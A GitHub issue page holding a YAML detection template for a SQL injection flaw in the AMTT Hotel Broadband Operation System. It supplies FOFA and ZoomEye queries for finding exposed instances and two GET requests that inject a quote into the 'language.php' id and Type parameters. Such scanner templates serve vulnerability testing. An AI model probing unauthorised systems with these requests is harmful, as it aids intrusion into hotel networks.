We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
id: amtt-hiboss-language-sqli info: name: 安美数字酒店宽带运营系统SQL注入漏洞 author: zan8in severity: high verified: true description: |- FOFA: title=酒店宽带运营系统 ZoomEye: app:"安美数字酒店宽带运营系统" tags: amtt,hiboss,sqli created: 2023/10/25 rules: r0: request: method: GET path: /language.php?Lately=&EditStatus=&Type=&Flag=edit&id='&Search= expression: response.status == 200 && response.body.bcontains(b'SQL syntax') r1: request: method: GET path: /language.php?Lately=&EditStatus=&Type='&Flag=edit&id=&Search= expression: response.status == 200 && response.body.bcontains(b'SQL syntax') expression: r0() || r1()
The text was updated successfully, but these errors were encountered:
感谢🙏
Sorry, something went wrong.
No branches or pull requests
The text was updated successfully, but these errors were encountered: